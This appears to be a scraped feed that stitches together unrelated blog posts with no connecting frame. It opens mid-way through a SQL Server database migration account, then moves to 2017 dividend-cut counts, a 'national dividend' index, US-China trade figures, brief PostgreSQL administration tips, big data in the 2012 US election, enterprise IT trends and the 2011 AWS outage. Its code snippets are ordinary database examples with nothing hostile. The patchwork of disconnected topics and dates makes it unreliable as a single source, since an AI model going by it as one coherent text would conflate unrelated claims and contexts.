    Shortly after midnight Saturday morning, Scott detached the old database, copied the files to the new server, and re-attached them.  This process took about 5 minutes, during which time I was ftp-ing web.config files to the various sites to update their connection string information, and Scott was updating a couple of machine.config entries that held similar info.  When the database came up, it didn't work immediately.  We found that for some reason IIS or ASP.NET's connection pool was holding a connection to the old database but was trying to use the new uid.  Each site needed to have its appdomain restarted.  Another issue was that some sites had been using 'ssmith' as their user id, and some of the objects (tables and stored procedures) they were referencing were owned by ssmith.  Now that they were using a domain name as their username, they couldn't view these objects, so we needed to change the owner of these objects to 'dbo' so that all users could use them.  An old script I have (which David Penton originally provided to me) came in very handy, and allowed us to quickly switch all the important objects over to 'dbo' ownership.
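    The ownership fix described above can be sketched with the SQL Server 2000-era sp_changeobjectowner procedure; the object names here are hypothetical stand-ins for the real tables and stored procedures:

```sql
-- Reassign objects owned by 'ssmith' to 'dbo' so that every login
-- can resolve them without an explicit owner prefix.
EXEC sp_changeobjectowner 'ssmith.Articles', 'dbo';
EXEC sp_changeobjectowner 'ssmith.GetArticleList', 'dbo';

-- A script can automate this by looping over every user-owned
-- object in sysobjects, which is essentially what ours did.
```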

    Checking each site and making these db changes, as well as generally monitoring things and seeing how well the new server was performing, took us another hour or so.  Once I was confident that all of the critical sites had been migrated, we set up a Sql Profiler on the shared server to record the requests that were still coming in to it so that I could track down the applications responsible and point them to the new database.

    Lessons Learned

    1. I've moved databases before, so having centralized connection strings was something I already knew the importance of.  Having everything in web.config and/or machine.config files made this move a lot easier than it might otherwise have been.

    2. Even though total downtime was only a matter of minutes, I still got a few concerned IMs from people about the site being down.  I would love to have a better way to move a database from one box to another with less downtime.  A tool that would allow one to copy files from a live database (without the need to detach it) would be helpful here, I think.

    3. Having the right skills is very important.  Some of the tasks required I didn't know how to do or had never done before, but Scott was easily able to accomplish.  I was intimately familiar with my own applications, so I was able to quickly track down the needed configuration settings and change them myself or direct Scott to them.  If either one of us had been novice or unfamiliar with the application, things would have been a lot hairier.

    4. Use separate logins for different sites (and possibly applications) so that you can determine easily which users of your database are responsible for most of its load.  I wasn't sure if the major contributor to the db's load was AspAlliance.com, with its 4M page views per month, or Ads.AspAlliance.com, which serves almost 50M advertisements per month.  It turned out that AspAlliance.com was the major culprit, so now I know I need to work on optimizing its design further (it's quite db chatty at the moment).

              The Pace of Dividend Cuts Announced in 2017-Q2   

    We're almost to the end of 2017-Q2, so we'll take one last snapshot of how the pace of dividend cuts being reported in our ongoing real-time sampling are stacking up for the calendar quarter. First, here's how the second quarter of 2017 compares with the preceding quarter of 2017-Q1:

    Cumulative Announced Dividend Cuts in U.S. by Day of Quarter in 2017, 2017-Q1 and 2017-Q2, Snapshot on 2017-06-21

    As of 21 June 2017, the number of dividend cuts announced during 2017-Q2 is slightly higher than what was reported in 2017-Q1, with 44 in the current quarter's sample as compared to the previous quarter's 41 as of the same relative point of time in the quarter.

    But 2017-Q2 is running well behind the year-ago quarter of 2016-Q2, which had 59 dividend cut announcements through the similar point of time in the quarter....

    Cumulative Announced Dividend Cuts in U.S. by Day of Quarter, 2016-Q2 vs 2017-Q2, Snapshot on 2017-06-21

    All in all, the number of dividend cuts in the quarter is consistent with recessionary conditions being present in the U.S. economy.

    In our sampling, about 41% of the firms announcing decreases in their dividend payments to their shareholding owners are in the oil and gas sector of the U.S. economy, which follows from the reduced revenues they're earning with reduced oil prices in the global market.

    There is also a high percentage of financial firms and real estate investment trusts in the mix, which combine to account for 25% of the total. The remaining firms come from seven different industries, most notably chemical producers of agricultural fertilizers, an industry that accounts for 11% of the 44 sampled dividend cutting firms during the quarter.

    Data Sources

    Seeking Alpha Market Currents. Filtered for Dividends. [Online Database]. Accessed 21 June 2017.

    Wall Street Journal. Dividend Declarations. [Online Database]. Accessed 21 June 2017.

              The U.S. National Dividend Through April 2017   

    How well are typical American households faring so far in 2017?

    To answer that question, we're going to turn to a unique measure of the well-being of a nation's people called the national dividend. The national dividend is an alternative measure of economic well-being that is based primarily upon the value of the things that people choose to consume in their households. That makes it very different from, and by some accounts a more effective measure than, the more common measures that focus upon income or expenditures throughout the entire economy, like GDP, which have proven not to be well suited to assessing the economic welfare of the people themselves.

    In our case, we've developed the national dividend concept that had been originally conceived by Irving Fisher back in 1906, but which fell by the wayside in the years that followed because of the challenge of collecting the kind of consumption data needed to make it a reality. That kind of data exists today, which is why we've been able to bring it back to life.

    With that introduction now out of the way, let's update the U.S.' national dividend through the end of April 2017 following our previous snapshot through the end of 2016.

    Monthly National Dividend, January 2000 through April 2017

    In the first four months of 2017, we see that in nominal terms, the national dividend has risen strongly following a lackluster 2016. That observation holds after adjusting for inflation, which suggests that the typical American household is benefiting from real growth.

    You can see that perhaps better with our calculation of the year over year growth rates for the nominal and inflation-adjusted national dividend, which we show in the following chart from January 2001 through April 2017.

    Year Over Year Growth Rates for the Monthly National Dividend, January 2001 through April 2017

    Year to date, the upward trend for 2017 appears to be much better than the previous downward trend through 2016 was.

    Previously on Political Calculations

    The following posts will take you through our work in developing Irving Fisher's national dividend concept into an alternative method for assessing the relative economic well being of American households.


    Chand, Smriti. National Income: Definition, Concepts and Methods of Measuring National Income. [Online Article]. Accessed 14 March 2015.

    Kennedy, M. Maria John. Macroeconomic Theory. [Online Text]. 2011. Accessed 15 March 2015.

    Political Calculations. Modeling U.S. Households Since 1900. 8 February 2013.

    Sentier Research. Household Income Trends: April 2017. [PDF Document]. 23 May 2017. [Note: We have converted all the older inflation-adjusted values presented in this source to be in terms of their original, nominal values (a.k.a. "current U.S. dollars") for use in approximating the national dividend.]

    U.S. Bureau of Labor Statistics. Consumer Expenditure Survey. Total Average Annual Expenditures. 1984-2015. [Online Database]. Accessed 7 February 2017.

    U.S. Bureau of Labor Statistics. Consumer Price Index - All Urban Consumers (CPI-U), All Items, All Cities, Non-Seasonally Adjusted. CPI Detailed Report Tables. Table 24. [Online Database]. Accessed 13 June 2017.

              Uncovering a Hidden Story in U.S.-China Trade   

    There is a surprising story that is flying under the radar in almost all of the reporting on the United States' trade with China in April 2017. To see what we mean, here are some key excerpts from a recent news report following the U.S. Census Bureau's reporting of its foreign trade balance data for the month (emphasis ours):

    The U.S. trade deficit widened more than expected in April amid a surge in cellphone imports, suggesting trade could be a drag on economic growth in the second quarter....

    Exports to China increased 2.2 percent, but the value of goods shipped to Mexico and Canada dropped 10.3 percent and 9.0 percent, respectively. Exports to Germany tumbled 13.3 percent....

    Imports of goods and services increased 0.8 percent to $238.6 billion. Cellphone imports jumped $1.8 billion, accounting for the bulk of the increase in consumer goods imports. Imports of industrial supplies, however, fell $1.5 billion, with crude oil imports declining $1.9 billion.

    The country imported 229 million barrels of oil in April, the smallest amount since October 2016. Imports of goods from China jumped 9.6 percent. Imports from Germany fell 4.1 percent.

    The politically sensitive U.S.-China trade deficit increased 12.4 percent to $27.6 billion in April, while the trade gap with Germany rose 4.3 percent to $5.5 billion.

    We selected these particular excerpts because we want to focus in on two aspects of the reporting.

    • The trade balance between the U.S. and China.
    • Oil imports and exports.

    If you read the article in full, you would never know that U.S. exports to China increased in April 2017 by 20.8% over their April 2016 level, which is faster than the 13.6% year over year rate of growth for China's exports to the U.S.

    Year over Year Growth Rate of U.S.-China Exchange Rate-Adjusted Trade in Goods and Services, January 1986 through April 2017

    Despite the U.S.' faster rate of export growth, the U.S.-China trade deficit widened because the base value of the goods and services that China exports to the U.S. is nearly four times as large as the value of what the U.S. exports to China. If however the U.S. can continue to grow its exports to China at a faster rate than it grows its imports, that gap will narrow.

    That brings us to oil, which has recently become a major export product for the U.S. economy, where China is becoming a very large consumer.

    If you go back to the article we quoted at the beginning of this analysis, since it only discusses U.S. oil imports without any mention of U.S. oil exports, you might never know that increased U.S. exports of oil to China accounted for 43% of the $1.2 billion year over year increase in the value of the U.S.' total exports to that nation for April 2017.

    And that's the hidden story in U.S.-China trade. In becoming a major oil-exporting nation over the last year, the U.S. has the means to significantly shrink its trade deficit with China, thanks to that nation's growing appetite as the world's largest consumer of petroleum and other hydrocarbon products, where oil has the potential to replace soybeans as the U.S.' top export product to China.

    That new trade can also provide a more direct indication of the relative health of China's economy, which we'll explore in greater detail in the future.

    Data Sources

    U.S. Census Bureau. Trade in Goods with China. Accessed 5 June 2017.

    Board of Governors of the Federal Reserve System. China / U.S. Foreign Exchange Rate. G.5 Foreign Exchange Rates. Accessed 5 June 2017.

    Energy Information Administration. U.S. Exports to China of Crude Oil and Petroleum Products (Thousand Barrels). [Online Database]. Accessed 5 June 2017.

              Introduction to Full Text Indexing   
    Full text indexing in PostgreSQL is a little more complicated to set up than in other databases.

    This is a quick introduction on how to install it, how to set it up and how to keep it up to date.
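    As a hedged sketch of what the setup looks like in later PostgreSQL releases (8.3 and newer, where full text search is built in; older versions needed a contrib module), assuming a hypothetical articles table:

```sql
-- Add a tsvector column and populate it from the text fields.
ALTER TABLE articles ADD COLUMN tsv tsvector;
UPDATE articles
   SET tsv = to_tsvector('english', coalesce(title, '') || ' ' || coalesce(body, ''));

-- A GIN index makes @@ (match) searches fast.
CREATE INDEX articles_tsv_idx ON articles USING gin (tsv);

-- Keep the column up to date on INSERT and UPDATE.
CREATE TRIGGER articles_tsv_update
BEFORE INSERT OR UPDATE ON articles
FOR EACH ROW EXECUTE PROCEDURE
    tsvector_update_trigger(tsv, 'pg_catalog.english', title, body);

-- Search it.
SELECT title FROM articles WHERE tsv @@ to_tsquery('english', 'index & database');
```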

              Using Explain   
    Now that you've set up a database, you need to check it's being utilized properly.

    Using 'Explain' to check your queries are using an index is a good way to do it. Here's a quick introduction to reading the output.
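    For instance, with a hypothetical users table, you can compare the plan before and after adding an index (the exact plan text and cost numbers vary by version and data size):

```sql
EXPLAIN SELECT * FROM users WHERE email = 'someone@example.com';
-- Without an index, expect a sequential scan, something like:
--   Seq Scan on users  (cost=0.00..458.00 rows=1 width=68)
--     Filter: (email = 'someone@example.com'::text)

CREATE INDEX users_email_idx ON users (email);
ANALYZE users;  -- refresh the planner's statistics

EXPLAIN SELECT * FROM users WHERE email = 'someone@example.com';
-- With the index (and enough rows to make it worthwhile):
--   Index Scan using users_email_idx on users  (cost=0.00..8.27 rows=1 width=68)
```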

              Calculating database size   
    PostgreSQL creates a directory for each database. These directories aren't named after the databases; they are named with each database's OID (OIDs are "object identifiers"). This avoids issues when you rename databases, etc.

    How then do you find out a database's size?

    There is a "contrib" module called 'dbsize' which can do it for you. These modules don't get installed by default but allow extra functionality quite easily.

    See the documentation for details on how to use it.
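    In PostgreSQL 8.1 and later the dbsize functionality was folded into the core as built-in functions, so no contrib install is needed there. A quick sketch (the database name is illustrative):

```sql
-- Size of one database, raw and human-readable.
SELECT pg_database_size('mydb');
SELECT pg_size_pretty(pg_database_size('mydb'));

-- All databases, largest first.
SELECT datname, pg_size_pretty(pg_database_size(datname)) AS size
  FROM pg_database
 ORDER BY pg_database_size(datname) DESC;
```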

              How to index a database   
    Database indexing can be quite tricky. Here is a basic guide on how to get started with it, when you should index and when you shouldn't.

    Written for Interspire
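    As a minimal sketch of the usual starting points, using a hypothetical orders table (the rule of thumb: index columns that appear in WHERE clauses and joins, and skip columns you rarely filter on):

```sql
-- Single-column index for a common lookup.
CREATE INDEX orders_customer_id_idx ON orders (customer_id);

-- Multicolumn index: useful when queries filter on customer_id
-- and sort by created_at; column order matters.
CREATE INDEX orders_customer_created_idx ON orders (customer_id, created_at);

-- Partial index: only index the rows you actually query.
CREATE INDEX orders_unshipped_idx ON orders (created_at) WHERE shipped = false;

-- Every index slows INSERT/UPDATE/DELETE a little, so don't index
-- columns you never search on.
```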
              Showing Running Queries   
    Newer versions of PostgreSQL have a 'pg_stat_activity' view to show you who is currently connected to your database system.

    By default, this doesn't show you the queries being run.

    How do you show that?

    Edit your postgresql.conf file and add (or uncomment):

    stats_command_string = true

    and restart postgresql.

    See official documentation for more information.

    (This is practically equivalent to the mysql 'show processlist' command).
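    Once the setting is active, a query along these lines shows who is running what (column names changed in PostgreSQL 9.2: procpid and current_query became pid and query):

```sql
-- Connected sessions and their active statements (pre-9.2 column names).
SELECT procpid, usename, datname, current_query
  FROM pg_stat_activity
 WHERE current_query <> '<IDLE>';
```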

              Introduction to Database Datatypes   
    Databases can store lots of different data in quite a few different ways. This guide shows some of the basic and common types you'll run across and how to pick which type is the right one to use.

    Written for Interspire
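    A short illustrative table exercising the common PostgreSQL types such a guide typically covers (the table and column names are made up for the example):

```sql
CREATE TABLE customers (
    id          serial PRIMARY KEY,         -- auto-incrementing integer
    name        varchar(100) NOT NULL,      -- bounded text
    notes       text,                       -- unbounded text
    balance     numeric(10,2) DEFAULT 0,    -- exact decimal: right for money
    signup_date date DEFAULT current_date,  -- calendar date
    last_login  timestamp,                  -- date plus time
    active      boolean DEFAULT true        -- true/false flag
);
```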
               Big Data: In Election And In Business Creates Big Impact   

    The US election results and the process have created worldwide impact. Not only was the election noticed for electing someone to arguably the most powerful office in the world, it brought with it many innovations and advances. In 2008, when Mr. Obama won the election for the first time, it was very clear that technology played a substantial role in his assuming office. We saw in 2008 that the online world was leveraged in a big way in the campaigns, to a very successful outcome. In the just-concluded 2012 election, data, data insights and data-centric predictions clearly played a very big role in shaping the election outcome.

    A lot of deserved kudos went in the direction of Nate Silver for his super-accurate predictions of the election results based on data insights. Many people looked at it from different perspectives. The media industry focused on how work like this will, in and of itself, influence the media coverage of elections and the assessment of preference trends. Nate is the author of the Amazon best-selling book, “The Signal and the Noise: The Art and Science of Prediction”. In the days leading up to the election, he was on every major media show, explaining how a detailed analysis of huge amounts of data, distilled from many different sources, enabled him and his team to predict with a fair degree of confidence and certainty what would happen district by district in the US elections (it's actually a great reward to see Nate Silver's appearance on Stephen Colbert's show, reported by the LA Times). Very clearly, he was accurate to the last level of detail, in an election in which swings were noticed by both sides and in which, in the days close to the election, the challenger's supposed "momentum vote" was muddying the trends.

    A lovely article by John McDermott at AdAge brings out that Silver's work will help shift the "touch and feel" aspects of reporting toward reporting that is anchored in data: facts and statistics. The article quotes ComScore's online traffic analyst Andrew Lipsman as saying, "Now that people have seen [data analysis centered political analysis] proven over a couple of cycles, people will be more grounded in the numbers." Chatter in the online world, quoting Bloomberg as the source, suggested that Barack Obama's site was placing 87 tracking cookies on the computers of people who accessed it, while Mitt Romney's site was placing 48. Tarun Wadhwa reports at Forbes that the power of big data has finally been realized in the US political process:

    “Beyond just personal vindication, Silver has proven to the public the power of Big Data in transforming our electoral process. We already rely on statistical models to do everything from flying our airplanes to predicting the weather. This serves as yet another example of computers showing their ability to be better at handling the unknown than loud-talking experts. By winning ‘the nerdiest election in the history of the American Republic,’ Barack Obama has cemented the role of Big Data in every aspect of the campaigning process. His ultimate success came from the work of historic get-out-the-vote efforts dominated by targeted messaging and digital behavioral tracking.” This election has proven that the field of “political data science” is now more than just a concept: it’s a proven, election-winning approach that will continue to revolutionize the way campaigns are run for decades to come. It is common knowledge that the campaign had been heavily leveraging the web platform in very many sophisticated ways. The campaign spectacularly succeeded in integrating its political infrastructure with the web infrastructure it managed to create. A peer-to-peer, bottom-up campaign seemed to be the strategy that finally delivered results. Volunteer participation, feedback synthesis and citizen vote drives were successfully carried out at a massive scale hitherto unknown on the web platform. The campaign, heavily shaped by the power of social networks and the internet, energized youth power in unimaginable ways, signifying the triumph of technology. It’s a treat to watch: mobile, social and big data coming together and making an impact in the 2012 presidential election.

    Let’s look at the complexities involved in this exercise. A notable demographic shift in America resulted in the traditional vote bases being less influential (a trend that will continue dramatically in the future): the absolute numbers may not have come down, but their proportion of the votable base lowered somewhat, leaving the destiny in the hands of a newly emerging swing voter base. Technology played a significant role in rigorous fact checking: imagine, during a presidential debate, typical citizens looking at fact-checking analysis on their other screens while watching the debate on television. Pew Research found that many were watching dual screens during the debate. All is well, until one looks at the paradox here: as more and more effort is made and money is spent to flood the media with political messages, the impact is significantly less, as people no longer rely on a single news source. Many American homes today are embracing the "four screen" world (TV, laptop, tablet and phone, all used in tandem for everything in our lives), and so the ability of any promotion to create a positive impact is becoming tougher and tougher.

    This is observed alongside the fact that the U.S. is also undergoing deep structural and institutional change, affecting every walk of American life. While the online world is growing, it is a common sight in cities and downtowns to see established chains closing shops, unable to hold off competition striking at them from the cyberworld. Trends like this clearly influence the economic role played by different industries, and trends in wealth creation, job creation, city growth, etc. Younger voters are, by default, more clued in to these changing trends and their impact, and so begin to think of their prospects through a different prism than older voters, who generally hold conventional views; this further creates a deeper strata within the society.

    Time magazine has Michael Scherer doing an in-depth assessment of the role big data and data mining played in Obama's campaign as well. Campaign manager Jim Messina, Scherer writes, "promised a totally different, metric-driven kind of campaign in which politics was the goal but political instincts might not be the means" and employed a massive number of data crunchers to establish an analytics edge for the campaign. The campaign team put together a massive database that pulled information from all areas of the campaign — social media, pollsters, consumer databases, fundraisers, etc. — and merged them into one central location. The current US President's (Mr. Obama's) campaign believed that its biggest institutional advantage over its opponent's campaign was its data, and went out of its way to keep the data team away from the glare: they worked in windowless rooms, and each team member was given a codename. That in and of itself signifies the importance the campaign attached to data, and to big data in particular.

    Scherer adds: “The new megafile didn’t just tell the campaign how to find voters and get their attention; it also allowed the number crunchers to run tests predicting which types of people would be persuaded by certain kinds of appeals.” Scherer’s piece is an astoundingly fascinating look at how data was put to use in a successful presidential campaign. The election results are, in a way, a big victory for the nerds and big data. Similarly, some time back there was a sensational article on how Target figured out a teenage girl was pregnant even before her father could find out. Inside enterprises, there should be big advocates for creating frameworks to "know everything" through the world of data and to align the business to succeed.

    Large-scale data gathering and analytics are quickly becoming a new frontier of competitive differentiation. While the moves of online business leaders like Amazon.com, Google, and Netflix get noted, many traditional companies are quietly making progress as well. In fact, companies in industries ranging from pharmaceuticals to retailing to telecommunications to insurance have recently begun moving forward with big data strategies. Inside business enterprises there is a similar revolution happening: the collection of very fine-grained data, made available for analysis in near real time. This helps enterprises learn about the preferences of an individual customer and personalize the offering for that particular customer, a unique customer experience that would make them come back again and again to do more business. Practically speaking, one of the largest transformations to happen to large enterprises has involved implementing systems like ERP (enterprise resource planning), CRM (customer relationship management) and SCM (supply chain management), the large enterprise systems that companies have spent huge sums of dollars on. These systems typically manage operations extremely well and then set the stage for enterprises to gain business intelligence and learn how they could be managed differently. That's where big data frameworks come in handy, and it's up to business now to seize that opportunity and take advantage of this very fine-grained data that just didn't exist in similar forms previously. Too few enterprises today fully grasp big data's potential in their businesses, the data assets and liabilities of those businesses, or the strategic choices they must make to start leveraging big data. By focusing on these issues, enterprises can help their organizations build a data-driven competitive edge, which in this age is clearly a very powerful determinant of success.

              The Next Wave Of Technology Led Business Gains   

    I was in a long conversation with the CIO of a Fortune 500 company recently, and invariably the conversation turned towards how much more difficult it is becoming for the IT organization to continue to delight the business – the world of business itself is undergoing massive changes while the world of technology is also changing very fast. The IT organization is supposed to stay on top of this whirlwind of change, continue to support the present, and also be the enabler of change for the future – all this when the dollars and cents spent on IT matter more than ever. This week, as I finished my keynote address at PSGTECH and sat for questions, more and more of this began to look clear to me.

    Let’s look from the outside: what are the contours of the deep change that need to be understood to remain relevant today and stay competitive? Starting from the dawn of this new century, there has been a deep-rooted shift in the sphere of IT innovation. Earlier, new technologies, products and systems that hit the market found their footing mostly at the Fortune 500 companies (typifying the high-spend, highly mature, high-growth areas of applied IT innovation). Then medium-sized enterprises would try and adapt those systems, and the SOHO and consumer segments would get to use them in time. This flow seems to have reversed noticeably in the last decade. It may not be an overstatement to say that today, cool, modern technology tends to get adopted and popularised at the consumer and SOHO end of the spectrum before moving on to the late-adopter class: medium and large enterprises.

    It may be tempting to dismiss such claims as outlandish or as based on a limited set of data – but unarguably the trend is set and widely recognisable. This can also be seen by some as not a matter of great concern to the large enterprises. For some inside the large enterprises, such things have never bothered them for decades – after all, they are the biggest spenders on IT and have traditionally leveraged IT substantially with proven methods of success. For others inside the enterprise, consumer-centric services like social sites and games are all mindless distraction, and these should find no place inside the large enterprise.

    What’s my view on this? Are the large enterprises correct in taking such a “prim and proper” view? No – an emphatic and clear “NO”. What’s happening in the consumer, social and mobile space is nothing short of creating a new paradigm of doing business – it is as if a new set of DNA strands is coming together to create a new organism, nothing short of it. Those enterprises that fail to recognize this, or choose not to participate in this journey, would be missing out on a huge chance of business success.

    Let’s look deeper here: Twitter, Facebook, Google Plus and mobile are actually creating a new sort of connected world, wherein new rules of presence, social relationships and collaboration are getting shaped. Needless to say, these new rules will be the drivers and enablers of innovation and competitive success for tomorrow – and big enterprises will approach that tomorrow faster than anything they have seen at any point in the past. The digital natives who are at the forefront of this revolution would never allow this journey to be slowed or halted. Big and medium enterprises that follow a “wait and watch” attitude will fail demonstrably in their ability to reach out to a new generation of customers and stakeholders, who are beating their drums to a different future. And inside these enterprises, a phenomenal opportunity to redefine ways of working and foster effective collaboration would get lost if they don’t adopt this quickly enough.

    Enter the world of connectedness through social: from car buying to university selection to travelling to holiday shopping to medical concerns, the world is getting engulfed by social tools and mechanisms. Look deeper, at the heart of the social phenomenon: the people who matter, the consumers, are connecting with one another in an unprecedented manner, creating a vast and efficient network of information that shapes and steers experiences and markets. What do they get out of this? The participants are beneficiaries of a new genre of collective intelligence that informs and guides people in real time in a myriad of ways. By making available a universally accessible platform that facilitates discussion of the experiences consumers have had with brands and businesses, we have created a new world of consumer influence.

    The consumer world has adopted this much faster than expected – right from Googling for an instant answer about points of interest, to comparison shopping, to assessing medical facilities, electronics purchases and university education. One can see a pool of like-minded people sharing their views, from which any information seeker can draw appropriate inferences. All a click away, in real time.

    Now let’s turn our attention to the enterprise from the same perspective.

    From the industry supply side, the enterprise software industry can’t avoid the glaringly noticeable trend. This is an industry – seen as ever-maturing by some and “never maturing” by others – and an ecosystem demonstrating growth indicators that are now visible to all observers. A range of data clearly supports the notion of growth: the value added by the industry over the last few years, the number of people the industry employs, the projected growth rates, the capital outlay for the industry, and so on.

    The consumerization of the enterprise is moving ahead at full speed and may become irreversible. While some enterprises are still only experimenting with this, wherever adoption has happened the surge in interest appears high, promising to make the adoption of such technologies faster and deeper within enterprises. The interesting part of the equation is that a number of newcomers are arriving with a variety of solutions, and enterprises see before them humongous opportunities for differentiation and for fostering competitive advantage in adopting such technologies.

    Most enterprises are still in slow-adoption mode. Are enterprises looking at moving beyond email as the standard way of communicating? Most CIOs and IT departments take a deep breath before trying to introduce any new technology inside their enterprise. It’s a classic problem – 75% or more of enterprise IT spend goes towards supporting investments and assets built in the past, aka legacy systems. How does the enterprise attack this cost structure? What’s the magic wand that would make enterprises adopt technology at the same speed as the consumer world is embracing it?

    Clearly the answer lies in a combination of vendor lock-in and data lock-in mechanisms. Vendor lock-ins are becoming manageable, with the body of knowledge on how to manage them having improved substantially over time; the question that begs an answer is: what is data/information lock-in? It is clearly the system of record. In a number of conversations with CIOs who want to move ahead and try new technologies, the defining condition that gets raised is: my backbone systems should not be tinkered with while you build jazzy front-office apps using collaborative tools and mechanisms – and then the question is how much more effective the whole thing, put together, can be.

    If you examine closely, the systems of record that anchor the enterprise internally (and which used to help in creating leading-edge enterprise solutions), though they may look to be working fine, may not necessarily be perfect in their composition. So much maintenance spend has to be committed to keep them performing continually – a challenge that lock-ins always bring to the fore. Meanwhile, all cost optimizations inside enterprise IT have traditionally focused on infrastructure, outsourcing and the like.

    In this flat economy and a maturing IT discipline, the common denominator across the board is that enterprises suffer from a serious commoditization-curve effect; creating and sustaining a competitive advantage through IT calls for getting their core business processes architected very differently, in a manner that competition would not find easy to imitate or catch up with. Such core processes would be in areas like customer support, supply chain and channel management. Here the IT system needs to be flexible and adaptive for varied forms of collaboration, as against a rigid form of communication. An arrangement in which new forms of collaboration can be enabled to provide high-quality support for the business would be a strong leading-edge differentiator for any enterprise.

    The underlying factor here is being able to tap a new order of productivity, not just the glamour of a new tool being brought in – and this is precisely the next orbit of progress for IT inside enterprises. Here the role IT plays goes beyond setting up the information backbone to helping create an intelligent business through empowerment – starting all the way from the bottom to the top of the organization, particularly by empowering operational executives better, transcending the barriers of language and geography, just as the consumer world has shown how effective this can be.

    Obviously, these mechanisms won’t replace the existing investments but will co-reside with them, with a focus on collaboration and engagement rather than just on plain transactions. This evolution can be seen as part of the progress from paper-based communications to email to the real-time connectivity of minds, as against just process-led workflows and systems. Mobile devices, video communications, ever-increasing bandwidth, multi-lingual support, and new enabling technologies like social and in-memory databases would all help create the right IT setup for organizations that put a premium on engagement to deliver better business results. Today, in the competitive global business ecosystem, cutting across almost all industries, there is an extended value chain that needs to perform efficiently to make business successful, and that’s where more and more enablement needs to go – it’s like pouring gas at the tip of the hockey-stick curve. We see huge opportunities for the next wave of business gains with such a focus.

              AWS Outage & Customer Readiness   

    Reddit, Foursquare, EngineYard and Quora were among the many sites that went down recently due to a rather prolonged outage of Amazon's cloud services. On Thursday, April 21, when Amazon Elastic Block Store (EBS) went offline, it took down many of the Web and database servers depending on that storage. With Amazon working aggressively to set things right, by Sunday, April 24, most of the services had been restored. As promised and as would be expected, Amazon has now come out with a detailed explanation describing what went wrong, why the failure was so widely felt, and why it took that much time to restore all the services. Some say that, measured against Amazon’s promised availability, this lengthy outage means Amazon would need to maintain full availability for more than a decade to adhere to its promised service-level commitments.

    Now, let’s examine what happened and how. To start with some basics: Amazon has its facilities spread around the world. Most users would know that its cloud computing data centers are in five different locations: Virginia, Northern California, Ireland, Singapore, and Tokyo. These centers are architected so that within each region, the cloud services are further separated into what Amazon calls Availability Zones. The availability zones are self-contained, with physically and logically separate groups of computers set up therein. Amazon explains that such an arrangement helps customers choose the level of redundancy appropriate to their own needs. Such a design, with a spectrum of options, also helps customers choose the right level of robustness when, for a premium, they choose to host across multiple regions. The logic here is that hosting in multiple availability zones within the same region should provide comparable robustness (as in hosting across multiple regions) but with much better economics, benefitting the customer.

    Amazon offers several services as part of this arrangement. Among them, Elastic Block Store (EBS) is an important one. With EBS, Amazon provides mountable disk volumes to virtual machines running on the better-known Elastic Compute Cloud (EC2). This is quite attractive to customers, as with this service Amazon provides the virtual machines with huge amounts of reliable storage – typically used for database hosting and the like. The power of this feature can be seen in the fact that, besides its use from EC2, another Amazon offering, the Amazon Relational Database Service (RDS), also uses it as a data store. For high availability, Amazon has designed EBS to replicate data between multiple systems. Given the volume and variety involved, this process is highly automated. In such an arrangement, if for some reason an EBS node loses the connection to its replica, alternate storage within the same zone is instantly made available to restore redundancy.

    As per Amazon, while doing routine maintenance in its Virginia operations on April 21, engineers were trying to make a change to the network configuration of the zone. As part of the process, traffic to the affected routers apparently got moved onto a low-capacity network instead of onto the backup. The low-capacity network is meant for handling inter-node communication, not large-scale replication and data transfer between systems, and so the additional traffic made the network malfunction. With the primary network brought down for maintenance and the secondary network completely malfunctioning, the EBS nodes lost their ability to replicate for want of reachable nodes. This is where the unintended consequences of automation began to rear their ugly head. Every system on the network acted as if it were at risk and began frenetically looking for available nodes with free space for replication. By the time Amazon tried to restore the primary network, the damage had been done: all the available space within the cluster had already been used, while the remaining nodes continued their search for nodes with free space that no longer existed.

    This massive deadlock of nodes hunting for replicas, with no nodes having free space, impacted the control system’s performance. The control system’s degraded performance in turn severely impacted the execution of new service requests, like creating a new volume. A long backlog built up for the slow control system to act upon and, with time, this reached catastrophic proportions, with some requests beginning to be returned with failure messages. Now comes the second but most crucial part of the outage – unlike the other services, the control systems span the whole region, not individual availability zones. The impact was therefore felt across different availability zones. Remember the idea of a Single Point Of Failure? It was proven here in its full might.
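    A back-of-the-envelope simulation (the numbers are made up, purely to illustrate the failure mode Amazon described) shows how the re-mirroring storm turns into a stuck backlog once free space runs out:

```python
# Made-up numbers, purely to illustrate the failure mode: every node that
# loses its replica immediately grabs free space, the pool drains, and
# the remainder become a stuck backlog hammering the control plane.
def remirror_storm(nodes_needing_replica, free_slots):
    replicated, stuck = 0, 0
    for _ in range(nodes_needing_replica):
        if free_slots > 0:
            free_slots -= 1   # replica found; that space is now consumed
            replicated += 1
        else:
            stuck += 1        # no space anywhere; node keeps retrying
    return replicated, stuck

# 1,000 nodes lose their replicas, but the cluster has only 200 free slots:
print(remirror_storm(1000, 200))  # (200, 800)
```

    The toy model makes the asymmetry plain: a modest shortfall of free capacity leaves the majority of nodes stuck in a retry loop, and it is those retries that swamped the region-wide control plane.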

    Slowly and deliberately, Amazon began the course correction – by tending to the control system and by adding more nodes to the cluster. Over time, the backlog on the control system began to clear, though this took painful effort and a lot of time. Outages of public cloud systems have made news in the past, but clearly, with time, the body of knowledge and maturity levels ought to improve things. Cloud service providers make high availability the cornerstone of their offerings, but this outage would in many ways put such claims into question. Even while this outage hit Amazon’s Virginia operations, there were many users of AWS who managed to maintain the availability of their systems. A majority of those installations had fallbacks in the form of multiple-region, multiple-zone coverage. Such moves necessarily bring the cost/complexity equation into consideration.

    It’s a little odd to see that, when the problem of node unavailability happened, Amazon’s own systems almost mounted a denial-of-service attack within their environment. Amazon now claims that this aspect of its crisis behavior has been set right, but one may have to wait until the next outage to see what else could give way. It may be noted that Amazon cloud services suffered a major outage in 2008 – the failure pattern looks somewhat similar upon diagnosis. Clearly, the systems need to operate differently under different circumstances – while it’s normal for nodes to keep replicating on storage or access concerns, the system ought to exhibit different behavior in a different kind of crisis. With the increasing adoption of public cloud services, the volume, complexity and range of workloads will certainly increase, and the systems will get tested under varying circumstances for availability and reliability. All business and IT users will seek answers to such questions as they consider moving their workloads onto the cloud.

